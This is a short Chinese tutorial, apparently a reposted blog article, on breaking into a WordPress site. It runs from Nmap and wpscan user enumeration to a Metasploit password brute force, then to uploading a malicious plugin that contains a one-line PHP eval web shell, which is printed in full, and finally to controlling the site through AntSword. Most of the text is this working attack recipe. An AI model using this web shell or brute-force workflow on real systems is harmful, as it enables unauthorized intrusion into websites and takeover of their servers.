条件:
本地机在10.xx
Kali也在10.xx 且能联网
蚁剑工具
Nmap进行扫描端口,发现只有80端口开放
使用wpscan工具,进行扫描
wpscan --url https://www.xxxxxxx.wiki/ --enumerate u
扫描指定用户
发现有几个用户
用msf对这几个用户进行密码爆破
得出登陆密码
登陆进入192.168.10.40
利用插件漏洞,进行渗透
下载插件
下载后解压,把一句话木马放入
Yjh.php
<?php
@eval($_POST[shell]);
?>
然后把该文件夹压缩为zip格式,上传插件
之后打开蚁剑
输入url地址为下
输入一句话密码,添加成功
即获取网站shell文章来源:https://www.toymoban.com/news/detail-416419.html
文章来源地址https://www.toymoban.com/news/detail-416419.html
到了这里,关于渗透wordpress过程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
